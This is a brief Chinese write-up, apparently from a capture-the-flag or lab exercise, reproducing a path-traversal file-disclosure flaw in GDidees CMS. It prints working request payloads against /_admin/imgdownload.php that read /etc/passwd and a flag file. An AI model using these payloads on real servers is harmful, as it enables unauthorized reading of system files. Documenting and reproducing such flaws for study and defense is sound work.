一、漏洞概述
GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞,漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。
二、影响范围
GDidees < v3.9.1
三、访问页面
四、漏洞复现
1、访问接口payload,发现下载一个图片。
/_admin/imgdownload.php?filename=../../../../../../../etc/passwd
2、编辑图片发现内容为服务器etc/passwd信息。
3、获取flag
/_admin/imgdownload.php?filename=../../../../../../../flag